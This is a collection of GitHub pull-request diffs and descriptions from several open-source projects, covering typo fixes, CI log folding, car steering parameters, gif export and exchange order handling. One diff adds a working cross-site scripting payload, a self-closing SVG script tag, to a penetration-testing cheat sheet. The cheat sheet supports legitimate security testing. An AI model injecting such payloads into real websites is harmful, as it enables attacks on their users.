diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json index 1d965a1e1..708eaed1b 100644 --- a/sherlock/resources/data.json +++ b/sherlock/resources/data.json @@ -593,6 +593,14 @@ "username_claimed": "blue", "username_unclaimed": "noonewouldeverusethis7" }, + "Enjin": { + "errorMsg": "Yikes, there seems to have been an error. We've taken note and will check out the problem right away!", + "errorType": "message", + "url": "https://www.enjin.com/profile/{}", + "urlMain": "https://www.enjin.com/", + "username_claimed": "blue", + "username_unclaimed": "noonewouldeverusethis7" + }, "Envato Forum": { "errorType": "status_code", "url": "https://forums.envato.com/u/{}",
https://api.github.com/repos/sherlock-project/sherlock/pulls/1543
2022-10-11T01:18:22Z
2022-10-16T00:49:55Z
2022-10-16T00:49:55Z
2023-04-23T00:30:03Z
232
sherlock-project/sherlock
36,256
fix typo with deepspeed/
diff --git a/deepspeed/autotuning/autotuner.py b/deepspeed/autotuning/autotuner.py index 73825a69f582..4ea71d317f2b 100755 --- a/deepspeed/autotuning/autotuner.py +++ b/deepspeed/autotuning/autotuner.py @@ -637,7 +637,7 @@ def tune_space(self, tuning_space, prev_max_mbs=0, prev_best_mbs=0, prev_best_me logger.info(f"End tuning for space: {tuning_space_name}") return max_micro_batch_size, best_mbs, best_metric_val - def get_plauteu_mbs(self, tuning_space_name): + def get_plateau_mbs(self, tuning_space_name): if tuning_space_name not in self.records: return 0 space_records = self.records[tuning_space_name] diff --git a/deepspeed/compression/compress.py b/deepspeed/compression/compress.py index 951ef1bb2da1..2f0e88beee21 100644 --- a/deepspeed/compression/compress.py +++ b/deepspeed/compression/compress.py @@ -213,14 +213,14 @@ def student_initialization(student_model, teacher_model, deepspeed_config): Example 1: bert.encoder.layer, for BERT_base model's prefix name Example 2: transformer.h, for GPT-2 hugging face prefix name teacher_layer (`list of integers`) - The layer of teacher will be used for student's reinitializedion + The layer of teacher will be used for student's reinitialization Example 1: [1,3,5,7,9], means we want to matches the 2nd/4th/6th/8th/10th layer of teacher to the first 5 layers of student student_layer (`list` or None) The layer of student need to be re-initialized Example 1: None, means we want to reinitialize all the layers Example 1: [0,1,2,3,4], means we want to reinitialize the first 5 layers other_module_name (`list of string`) - The modules will be used for student's reinitializedion + The modules will be used for student's reinitialization Example 1: ['bert.pooler', 'bert.embeddings', 'classifier'], means we want to apply the weight in teacher's embedding/pooler/classier module to the student Example 2: ['transformer.w', 'transformer.ln_f', 'lm_head'], means we want to apply the weight in teacher's embedding layers module to the student Note that teacher_layer should matches student layer diff --git a/deepspeed/nebula/constants.py b/deepspeed/nebula/constants.py index 2bfcef775145..9fa5769b5597 100644 --- a/deepspeed/nebula/constants.py +++ b/deepspeed/nebula/constants.py @@ -29,8 +29,8 @@ # There is a case where customer want to load the checkpoint saved # by raw torch. Because nebula cannot load torch checkpoint directly # as they have different folder structures to bring the gap for -# loading(the data are totally same in bytes for torch and nebula s -# aving). +# loading(the data are totally same in bytes for torch and nebula +# saving). # In this case, we must disable nebula load to use raw torch load. # Customer can just set NEBULA_ENABLE_NEBULA_LOAD to False. Then use # original way of deepspeed to load, i.e. set the value of "--load". diff --git a/deepspeed/runtime/checkpoint_engine/README.md b/deepspeed/runtime/checkpoint_engine/README.md index a19f54889802..c2b7940a414a 100644 --- a/deepspeed/runtime/checkpoint_engine/README.md +++ b/deepspeed/runtime/checkpoint_engine/README.md @@ -31,7 +31,7 @@ class CheckpointEngine(object): pass def commit(self, tag): - # to tell checkpoint services if all files are readys. + # to tell checkpoint services if all files are ready. pass ``` diff --git a/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py b/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py index 3f8978df0316..a341dffdf692 100644 --- a/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py +++ b/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py @@ -26,5 +26,5 @@ def load(self, path: str, map_location=None): pass def commit(self, tag): - # to tell checkpoint services if all files are readys. + # to tell checkpoint services if all files are ready. pass diff --git a/deepspeed/runtime/engine.py b/deepspeed/runtime/engine.py index 93ab0bdefc91..b638969755df 100644 --- a/deepspeed/runtime/engine.py +++ b/deepspeed/runtime/engine.py @@ -1916,7 +1916,7 @@ def set_gradient_accumulation_boundary(self, is_boundary): """ Manually overrides the DeepSpeed engine's gradient accumulation boundary state, this is an optional feature and should be used with care. The state should be set before to the intended - value before each forward/backward. The final fordward/backward should have the + value before each forward/backward. The final forward/backward should have the boundary state set to True. This style allows client code to only call engine.step() once after all the gradient accumulation passes are complete. See example below: .. code-block:: python
fix typo with deepspeed/ detail info modified: deepspeed/autotuning/autotuner.py modified: deepspeed/compression/compress.py modified: deepspeed/nebula/constants.py modified: deepspeed/runtime/checkpoint_engine/README.md modified: deepspeed/runtime/checkpoint_engine/checkpoint_engine.py modified: deepspeed/runtime/engine.py @microsoft-github-policy-service agree
https://api.github.com/repos/microsoft/DeepSpeed/pulls/3547
2023-05-16T01:03:03Z
2023-06-02T00:47:14Z
2023-06-02T00:47:14Z
2023-06-02T00:53:50Z
1,282
microsoft/DeepSpeed
10,713
Reduce build log verbosity on Travis
diff --git a/.travis.yml b/.travis.yml index 2b8eafc1396..89885d08e7b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -9,6 +9,7 @@ before_install: before_script: - 'if [ $TRAVIS_OS_NAME = osx ] ; then ulimit -n 1024 ; fi' + - export TOX_TESTENV_PASSENV=TRAVIS matrix: include: diff --git a/appveyor.yml b/appveyor.yml index ce2b5998ce3..2b6b82747a6 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -24,6 +24,7 @@ install: build: off test_script: + - set TOX_TESTENV_PASSENV=APPVEYOR # Test env is set by TOXENV env variable - tox diff --git a/tools/pip_install.py b/tools/pip_install.py index 354dce32b4c..4466729e03a 100755 --- a/tools/pip_install.py +++ b/tools/pip_install.py @@ -71,6 +71,11 @@ def main(args): tools_path = find_tools_path() working_dir = tempfile.mkdtemp() + if os.environ.get('TRAVIS'): + # When this script is executed on Travis, the following print will make the log + # be folded until the end command is printed (see finally section). + print('travis_fold:start:install_certbot_deps') + try: test_constraints = os.path.join(working_dir, 'test_constraints.txt') all_constraints = os.path.join(working_dir, 'all_constraints.txt') @@ -89,6 +94,8 @@ def main(args): call_with_print('"{0}" -m pip install --constraint "{1}" {2}' .format(sys.executable, all_constraints, ' '.join(args))) finally: + if os.environ.get('TRAVIS'): + print('travis_fold:end:install_certbot_deps') shutil.rmtree(working_dir) diff --git a/tox.ini b/tox.ini index 021c2394942..71491c34afc 100644 --- a/tox.ini +++ b/tox.ini @@ -64,9 +64,6 @@ source_paths = tests/lock_test.py [testenv] -passenv = - TRAVIS - APPVEYOR commands = {[base]install_and_test} {[base]all_packages} python tests/lock_test.py @@ -176,7 +173,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:nginx_compat] commands = @@ -187,7 +183,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:le_auto_precise] # At the moment, this tests under Python 2.7 only, as only that version is @@ -199,7 +194,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:le_auto_trusty] # At the moment, this tests under Python 2.7 only, as only that version is @@ -212,7 +206,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS TRAVIS_BRANCH [testenv:le_auto_wheezy]
PR #6568 removed the `--quiet` option in pip invocations, because this option deletes a lot of extremely useful logs when something goes wrong. However, when everything goes right, or at least when pip install is correctly executed, theses logs add hundreds of lines that are only noise, making hard to debug errors that can be in only one or two lines. We can have best of both worlds. Travis allows to fold large blocks of logs, that can be expanded directly from the UI if needed. It only requires to print in the console some specific code, that this PR implements in the `pip_install.py` script when the build is run in Travis (known by the existence of `TRAVIS` environment variable). I also take the occasion to clean up a little `tox.ini`. Note that AppVeyor does not have this fold capability, but it can be emulated using a proper capture of stdout/stderr delivered only when an error is detected.
https://api.github.com/repos/certbot/certbot/pulls/6597
2018-12-11T23:37:38Z
2019-01-09T04:45:17Z
2019-01-09T04:45:17Z
2019-01-09T16:24:59Z
789
certbot/certbot
420
[doc] update open-sora demo
diff --git a/README.md b/README.md index 2f6aa60678ef..7c234b15e75e 100644 --- a/README.md +++ b/README.md @@ -133,14 +133,13 @@ distributed training and inference in a few lines. [[HuggingFace model weights]](https://huggingface.co/hpcai-tech/Open-Sora) [[Demo]](https://github.com/hpcaitech/Open-Sora?tab=readme-ov-file#-latest-demo) -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-1.png" width=600/> -</p> - -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-2.png" width=600/> -</p> +<div align="center"> + <a href="https://www.youtube.com/watch?v=iDTxepqixuc"> + <img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/sora-demo.png" width="700" /> + </a> +</div> +<p align="right">(<a href="#top">back to top</a>)</p> ### Colossal-LLaMA-2 diff --git a/applications/README.md b/applications/README.md index 8abe1e52d96c..120767d5c9ea 100644 --- a/applications/README.md +++ b/applications/README.md @@ -4,7 +4,7 @@ This directory contains the applications that are powered by Colossal-AI. The list of applications include: -- [X] [Open-Sora](https://github.com/hpcaitech/Open-Sora): Sora Replication Solution with 46% Cost Reduction, Sequence Expansion to Nearly a Million +- [X] [Open-Sora](https://github.com/hpcaitech/Open-Sora): Revealing Complete Model Parameters, Training Details, and Everything for Sora-like Video Generation Models - [X] [Colossal-LLaMA-2](./Colossal-LLaMA-2/): Continual Pre-training of LLaMA-2. - [X] [ColossalEval](./ColossalEval): Evaluation Pipeline for LLMs. - [X] [ColossalChat](./Chat/README.md): Replication of ChatGPT with RLHF. diff --git a/docs/README-zh-Hans.md b/docs/README-zh-Hans.md index 7d267b16f442..93045ea6adc6 100644 --- a/docs/README-zh-Hans.md +++ b/docs/README-zh-Hans.md @@ -128,13 +128,11 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的 [[模型权重]](https://huggingface.co/hpcai-tech/Open-Sora) [[演示样例]](https://github.com/hpcaitech/Open-Sora?tab=readme-ov-file#-latest-demo) -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-1.png" width=600/> -</p> - -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-2.png" width=600/> -</p> +<div align="center"> + <a href="https://www.bilibili.com/video/BV1dW421c7MN"> + <img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/sora-demo-cn.png" width="700" /> + </a> +</div> ### Colossal-LLaMA-2
## 📌 Checklist before creating the PR - [ ] I have created an issue for this PR for traceability - [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description` - [ ] I have added relevant tags if possible for us to better distinguish different PRs ## 🚨 Issue number > Link this PR to your issue with words like fixed to automatically close the linked issue upon merge > > e.g. `fixed #1234`, `closed #1234`, `resolved #1234` ## 📝 What does this PR do? > Summarize your work here. > if you have any plots/diagrams/screenshots/tables, please attach them here. ## 💥 Checklist before requesting a review - [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue)) - [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible - [ ] I have performed a self-review of my code - [ ] I have added thorough tests. - [ ] I have added docstrings for all the functions/methods I implemented ## ⭐️ Do you enjoy contributing to Colossal-AI? - [ ] 🌝 Yes, I do. - [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/5479
2024-03-20T08:07:33Z
2024-03-20T08:08:41Z
2024-03-20T08:08:41Z
2024-03-20T08:09:44Z
888
hpcaitech/ColossalAI
10,998
Fixed Import Error
diff --git a/libs/langchain/langchain/vectorstores/weaviate.py b/libs/langchain/langchain/vectorstores/weaviate.py index 200ffedc6ef91d..3f965212241df1 100644 --- a/libs/langchain/langchain/vectorstores/weaviate.py +++ b/libs/langchain/langchain/vectorstores/weaviate.py @@ -99,7 +99,7 @@ def __init__( try: import weaviate except ImportError: - raise ValueError( + raise ImportError( "Could not import weaviate python package. " "Please install it with `pip install weaviate-client`." )
I have restructured the code to ensure uniform handling of ImportError. In place of previously used ValueError, I've adopted the standard practice of raising ImportError with explanatory messages. This modification enhances code readability and clarifies that any problems stem from module importation. @baskaryan, @eyurtsev, @rlancemartin.
https://api.github.com/repos/langchain-ai/langchain/pulls/10167
2023-09-04T07:26:06Z
2023-09-04T07:32:09Z
2023-09-04T07:32:09Z
2023-09-04T07:32:09Z
145
langchain-ai/langchain
43,521
Added new python library Neuron
diff --git a/README.md b/README.md index 8353b0e0..6697f855 100644 --- a/README.md +++ b/README.md @@ -893,6 +893,7 @@ on MNIST digits[DEEP LEARNING] <a name="python-neural networks"/> #### Neural networks * [Neural networks](https://github.com/karpathy/neuraltalk) - NeuralTalk is a Python+numpy project for learning Multimodal Recurrent Neural Networks that describe images with sentences. +* [Neuron](https://github.com/molcik/Neuron) - Neuron is simple class for time series predictions. It's utilize LNU (Linear Neural Unit), QNU (Quadratic Neural Unit), RBF (Radial Basis Function), MLP (Multi Layer Perceptron), MLP-ELM (Multi Layer Perceptron - Extreme Learning Machine) neural networks learned with Gradient descent or LeLevenberg–Marquardt algorithm. <a name="python-kaggle" />
Added new python library Neuron for time series predictions
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/307
2016-09-01T06:52:54Z
2016-09-01T14:37:46Z
2016-09-01T14:37:46Z
2016-09-01T14:37:50Z
224
josephmisiti/awesome-machine-learning
51,959
Chrysler: fix LKAS fault for 2017 Pacifica
diff --git a/selfdrive/car/chrysler/carcontroller.py b/selfdrive/car/chrysler/carcontroller.py index 5a2d90c64c2410..879da8812376ad 100644 --- a/selfdrive/car/chrysler/carcontroller.py +++ b/selfdrive/car/chrysler/carcontroller.py @@ -2,7 +2,7 @@ from common.realtime import DT_CTRL from selfdrive.car import apply_toyota_steer_torque_limits from selfdrive.car.chrysler.chryslercan import create_lkas_hud, create_lkas_command, create_cruise_buttons -from selfdrive.car.chrysler.values import CAR, RAM_CARS, CarControllerParams +from selfdrive.car.chrysler.values import RAM_CARS, CarControllerParams, ChryslerFlags class CarController: @@ -51,7 +51,7 @@ def update(self, CC, CS): lkas_control_bit = self.lkas_control_bit_prev if CS.out.vEgo > self.CP.minSteerSpeed: lkas_control_bit = True - elif self.CP.carFingerprint in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019): + elif self.CP.flags & ChryslerFlags.HIGHER_MIN_STEERING_SPEED: if CS.out.vEgo < (self.CP.minSteerSpeed - 3.0): lkas_control_bit = False elif self.CP.carFingerprint in RAM_CARS: diff --git a/selfdrive/car/chrysler/interface.py b/selfdrive/car/chrysler/interface.py index 5e8fe3c44ef9a8..2f058165ac96e0 100755 --- a/selfdrive/car/chrysler/interface.py +++ b/selfdrive/car/chrysler/interface.py @@ -2,7 +2,7 @@ from cereal import car from panda import Panda from selfdrive.car import STD_CARGO_KG, get_safety_config -from selfdrive.car.chrysler.values import CAR, DBC, RAM_HD, RAM_DT +from selfdrive.car.chrysler.values import CAR, DBC, RAM_HD, RAM_DT, RAM_CARS, ChryslerFlags from selfdrive.car.interfaces import CarInterfaceBase @@ -24,9 +24,12 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): ret.safetyConfigs[0].safetyParam |= Panda.FLAG_CHRYSLER_RAM_DT ret.minSteerSpeed = 3.8 # m/s - if candidate in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019): - # TODO: allow 2019 cars to steer down to 13 m/s if already engaged. - ret.minSteerSpeed = 17.5 # m/s 17 on the way up, 13 on the way down once engaged. + if candidate not in RAM_CARS: + # Newer FW versions standard on the following platforms, or flashed by a dealer onto older platforms have a higher minimum steering speed. + new_eps_platform = candidate in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019) + new_eps_firmware = any(fw.ecu == 'eps' and fw.fwVersion[:4] >= b"6841" for fw in car_fw) + if new_eps_platform or new_eps_firmware: + ret.flags |= ChryslerFlags.HIGHER_MIN_STEERING_SPEED.value # Chrysler if candidate in (CAR.PACIFICA_2017_HYBRID, CAR.PACIFICA_2018, CAR.PACIFICA_2018_HYBRID, CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020): @@ -55,10 +58,9 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): ret.mass = 2493. + STD_CARGO_KG CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning) ret.minSteerSpeed = 14.5 - if car_fw is not None: - for fw in car_fw: - if fw.ecu == 'eps' and fw.fwVersion[:8] in (b"68312176", b"68273275"): - ret.minSteerSpeed = 0. + for fw in car_fw: + if fw.ecu == 'eps' and fw.fwVersion.startswith((b"68312176", b"68273275")): + ret.minSteerSpeed = 0. elif candidate == CAR.RAM_HD: ret.steerActuatorDelay = 0.2 @@ -71,6 +73,10 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): else: raise ValueError(f"Unsupported car: {candidate}") + if ret.flags & ChryslerFlags.HIGHER_MIN_STEERING_SPEED: + # TODO: allow these cars to steer down to 13 m/s if already engaged. + ret.minSteerSpeed = 17.5 # m/s 17 on the way up, 13 on the way down once engaged. + ret.centerToFront = ret.wheelbase * 0.44 ret.enableBsm = 720 in fingerprint[0] diff --git a/selfdrive/car/chrysler/values.py b/selfdrive/car/chrysler/values.py index 16530ed9894956..02261a0b633587 100644 --- a/selfdrive/car/chrysler/values.py +++ b/selfdrive/car/chrysler/values.py @@ -1,3 +1,4 @@ +from enum import IntFlag from dataclasses import dataclass from enum import Enum from typing import Dict, List, Optional, Union @@ -11,6 +12,10 @@ Ecu = car.CarParams.Ecu +class ChryslerFlags(IntFlag): + HIGHER_MIN_STEERING_SPEED = 1 + + class CAR: # Chrysler PACIFICA_2017_HYBRID = "CHRYSLER PACIFICA HYBRID 2017"
fritzie29#1365 on Discord has a 2017 Pacifica with newer 2020 EPS firmware, meaning that the dealer likely reflashed their EPS while taking it in for service, raising their min steer speed unfortunately. We can't gate this on platform any more, since it can be different based on the EPS firmware. I quickly went through all our EPS firmwares, and this seems right, but will do a second check. EDIT: False alarm, this user reports that he had his entire rack and pinion replaced, and his dongle is the only one with this updated firmware, so it's unlikely this will become a widespread phenomenon. PR now only includes his FW and abstracts the higher steering speed limit into a flag EDIT 2: Actually I have a report of another user with a 2017 having their EPS flashed by a dealer only to find out they can't use LKAS under 30 any more. They got the dealer to flash them back and now can use at 9 mph again. The dealer told them to avoid having their EPS flashed. So it is possible for dealers to flash old EPS's, just exceedingly rare it appears. ![Screenshot from 2022-12-05 22-03-21](https://user-images.githubusercontent.com/25857203/205832983-a11ab953-dca9-461f-82cb-6e601fdaaa8f.png)
https://api.github.com/repos/commaai/openpilot/pulls/26711
2022-12-06T02:24:58Z
2022-12-07T20:04:33Z
2022-12-07T20:04:33Z
2022-12-07T20:04:34Z
1,384
commaai/openpilot
9,216
add Self Closing Script
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 8b46e60dfc..15495bddc4 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-htmlapplications) +- [XSS in HTML/Applications](#xss-in-llapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage) @@ -143,6 +143,7 @@ Svg payload <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) +<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script) Div payload <div onpointerover="alert(45)">MOVE HERE</div> @@ -1128,3 +1129,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) +- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/202
2020-05-06T18:29:52Z
2020-05-06T20:16:06Z
2020-05-06T20:16:06Z
2020-05-06T20:16:21Z
513
swisskyrepo/PayloadsAllTheThings
8,593
add option -i to save as gif
diff --git a/manimlib/config.py b/manimlib/config.py index 999c423ae7..c80740bed2 100644 --- a/manimlib/config.py +++ b/manimlib/config.py @@ -52,6 +52,11 @@ def parse_cli(): action="store_true", help="Save each frame as a png", ), + parser.add_argument( + "-i", "--save_as_gif", + action="store_true", + help="Save the video as gif", + ), parser.add_argument( "-f", "--show_file_in_finder", action="store_true", @@ -161,6 +166,7 @@ def get_configuration(args): "write_to_movie": args.write_to_movie or not args.save_last_frame, "save_last_frame": args.save_last_frame, "save_pngs": args.save_pngs, + "save_as_gif": args.save_as_gif, # If -t is passed in (for transparent), this will be RGBA "png_mode": "RGBA" if args.transparent else "RGB", "movie_file_extension": ".mov" if args.transparent else ".mp4", diff --git a/manimlib/scene/scene_file_writer.py b/manimlib/scene/scene_file_writer.py index 3b078a479b..5b6e903df1 100644 --- a/manimlib/scene/scene_file_writer.py +++ b/manimlib/scene/scene_file_writer.py @@ -27,6 +27,7 @@ class SceneFileWriter(object): "png_mode": "RGBA", "save_last_frame": False, "movie_file_extension": ".mp4", + "gif_file_extension": ".gif", "livestreaming": False, "to_twitch": False, "twitch_key": None, @@ -69,6 +70,12 @@ def init_output_directories(self): file_name, self.movie_file_extension ) ) + self.gif_file_path = os.path.join( + movie_dir, + add_extension_if_not_present( + file_name, self.gif_file_extension + ) + ) self.partial_movie_directory = guarantee_existance(os.path.join( movie_dir, self.get_partial_movie_directory(), @@ -299,10 +306,19 @@ def combine_movie_files(self): '-f', 'concat', '-safe', '0', '-i', file_list, - '-c', 'copy', '-loglevel', 'error', - movie_file_path + ] + if not self.save_as_gif: + commands +=[ + '-c', 'copy', + movie_file_path + ] + if self.save_as_gif: + movie_file_path=self.gif_file_path + commands +=[ + movie_file_path, + ] if not self.includes_sound: commands.insert(-1, '-an')
I added the option to save as gif, however the mp4 or mov file still needs to be saved as well. I'll be trying to find a workaround, but despite that it works. When using the -i option a .gif file will be saved to the output directory
https://api.github.com/repos/3b1b/manim/pulls/529
2019-05-08T05:11:55Z
2019-06-02T19:13:23Z
2019-06-02T19:13:23Z
2019-06-02T19:13:23Z
645
3b1b/manim
18,094
feat(bybit): improve market orders for UTA
diff --git a/ts/src/bybit.ts b/ts/src/bybit.ts index 87a9c5bd7d28..a4d6b4cf72ff 100644 --- a/ts/src/bybit.ts +++ b/ts/src/bybit.ts @@ -40,7 +40,7 @@ export default class bybit extends Exchange { 'closeAllPositions': false, 'closePosition': false, 'createMarketBuyOrderWithCost': true, - 'createMarketSellOrderWithCost': false, + 'createMarketSellOrderWithCost': true, 'createOrder': true, 'createOrders': true, 'createOrderWithTakeProfitAndStopLoss': true, @@ -960,7 +960,7 @@ export default class bybit extends Exchange { 'fetchMarkets': [ 'spot', 'linear', 'inverse', 'option' ], 'enableUnifiedMargin': undefined, 'enableUnifiedAccount': undefined, - 'createMarketBuyOrderRequiresPrice': true, + 'createMarketBuyOrderRequiresPrice': true, // only true for classic accounts 'createUnifiedMarginAccount': false, 'defaultType': 'swap', // 'swap', 'future', 'option', 'spot' 'defaultSubType': 'linear', // 'linear', 'inverse' @@ -3455,8 +3455,31 @@ export default class bybit extends Exchange { if (!market['spot']) { throw new NotSupported (this.id + ' createMarketBuyOrderWithCost() supports spot orders only'); } - params['createMarketBuyOrderRequiresPrice'] = false; - return await this.createOrder (symbol, 'market', 'buy', cost, undefined, params); + return await this.createOrder (symbol, 'market', 'buy', cost, 1, params); + } + + async createMarketSellOrderWithCost (symbol: string, cost, params = {}) { + /** + * @method + * @name bybit#createMarkeSellOrderWithCost + * @see https://bybit-exchange.github.io/docs/v5/order/create-order + * @description create a market sell order by providing the symbol and cost + * @param {string} symbol unified symbol of the market to create an order in + * @param {float} cost how much you want to trade in units of the quote currency + * @param {object} [params] extra parameters specific to the exchange API endpoint + * @returns {object} an [order structure]{@link https://docs.ccxt.com/#/?id=order-structure} + */ + await this.loadMarkets (); + const types = await this.isUnifiedEnabled (); + const enableUnifiedAccount = types[1]; + if (!enableUnifiedAccount) { + throw new NotSupported (this.id + ' createMarketSellOrderWithCost() supports UTA accounts only'); + } + const market = this.market (symbol); + if (!market['spot']) { + throw new NotSupported (this.id + ' createMarketSellOrderWithCost() supports spot orders only'); + } + return await this.createOrder (symbol, 'market', 'sell', cost, 1, params); } async createOrder (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}) { @@ -3501,7 +3524,7 @@ export default class bybit extends Exchange { } const trailingAmount = this.safeString2 (params, 'trailingAmount', 'trailingStop'); const isTrailingAmountOrder = trailingAmount !== undefined; - const orderRequest = this.createOrderRequest (symbol, type, side, amount, price, params); + const orderRequest = this.createOrderRequest (symbol, type, side, amount, price, params, enableUnifiedAccount); let response = undefined; if (isTrailingAmountOrder) { response = await this.privatePostV5PositionTradingStop (orderRequest); @@ -3524,7 +3547,7 @@ export default class bybit extends Exchange { return this.parseOrder (order, market); } - createOrderRequest (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}) { + createOrderRequest (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}, isUTA = true) { const market = this.market (symbol); symbol = market['symbol']; const lowerCaseType = type.toLowerCase (); @@ -3565,12 +3588,33 @@ export default class bybit extends Exchange { } else if (market['option']) { request['category'] = 'option'; } - if (market['spot'] && (type === 'market') && (side === 'buy')) { + const cost = this.safeString (params, 'cost'); + params = this.omit (params, 'cost'); + // if the cost is inferable, let's keep the old logic and ignore marketUnit, to minimize the impact of the changes + const isMarketBuyAndCostInferable = (lowerCaseType === 'market') && (side === 'buy') && ((price !== undefined) || (cost !== undefined)); + if (market['spot'] && (type === 'market') && isUTA && !isMarketBuyAndCostInferable) { + // UTA account can specify the cost of the order on both sides + if ((cost !== undefined) || (price !== undefined)) { + request['marketUnit'] = 'quoteCoin'; + let orderCost = undefined; + if (cost !== undefined) { + orderCost = cost; + } else { + const amountString = this.numberToString (amount); + const priceString = this.numberToString (price); + const quoteAmount = Precise.stringMul (amountString, priceString); + orderCost = quoteAmount; + } + request['qty'] = this.costToPrecision (symbol, orderCost); + } else { + request['marketUnit'] = 'baseCoin'; + request['qty'] = this.amountToPrecision (symbol, amount); + } + } else if (market['spot'] && (type === 'market') && (side === 'buy')) { + // classic accounts // for market buy it requires the amount of quote currency to spend let createMarketBuyOrderRequiresPrice = true; [ createMarketBuyOrderRequiresPrice, params ] = this.handleOptionAndParams (params, 'createOrder', 'createMarketBuyOrderRequiresPrice', true); - const cost = this.safeNumber (params, 'cost'); - params = this.omit (params, 'cost'); if (createMarketBuyOrderRequiresPrice) { if ((price === undefined) && (cost === undefined)) { throw new InvalidOrder (this.id + ' createOrder() requires the price argument for market buy orders to calculate the total cost to spend (amount * price), alternatively set the createMarketBuyOrderRequiresPrice option or param to false and pass the cost to spend in the amount argument'); @@ -3686,6 +3730,8 @@ export default class bybit extends Exchange { * @returns {object} an [order structure]{@link https://docs.ccxt.com/#/?id=order-structure} */ await this.loadMarkets (); + const accounts = await this.isUnifiedEnabled (); + const isUta = accounts[1]; const ordersRequests = []; const orderSymbols = []; for (let i = 0; i < orders.length; i++) { @@ -3697,7 +3743,7 @@ export default class bybit extends Exchange { const amount = this.safeValue (rawOrder, 'amount'); const price = this.safeValue (rawOrder, 'price'); const orderParams = this.safeValue (rawOrder, 'params', {}); - const orderRequest = this.createOrderRequest (marketId, type, side, amount, price, orderParams); + const orderRequest = this.createOrderRequest (marketId, type, side, amount, price, orderParams, isUta); ordersRequests.push (orderRequest); } const symbols = this.marketSymbols (orderSymbols, undefined, false, true, true); diff --git a/ts/src/test/static/request/bybit.json b/ts/src/test/static/request/bybit.json index 0d99684ffbb5..d56fea7de554 100644 --- a/ts/src/test/static/request/bybit.json +++ b/ts/src/test/static/request/bybit.json @@ -216,9 +216,12 @@ "output": "{\"symbol\":\"BTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Limit\",\"category\":\"linear\",\"qty\":\"0.001\",\"price\":\"41000\",\"triggerDirection\":1,\"triggerPrice\":\"40000\",\"stopLoss\":\"39500\"}" }, { - "description": "Spot market buy order with createMarketBuyOrderRequiresPrice set to false on the testnet", + "description": "Spot market buy order with createMarketBuyOrderRequiresPrice set to false on the testnet (classic only)", "method": "createOrder", "url": "https://api-testnet.bybit.com/v5/order/create", + "options": { + "enableUnifiedAccount": false + }, "input": [ "BTC/USDT", "market", @@ -274,6 +277,47 @@ } ], "output": "{\"symbol\":\"BTCUSD\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"inverse\",\"qty\":\"1\",\"reduceOnly\":true}" + }, + { + "description": "Create market buy with base amount (UTA only)", + "method": "createOrder", + "url": 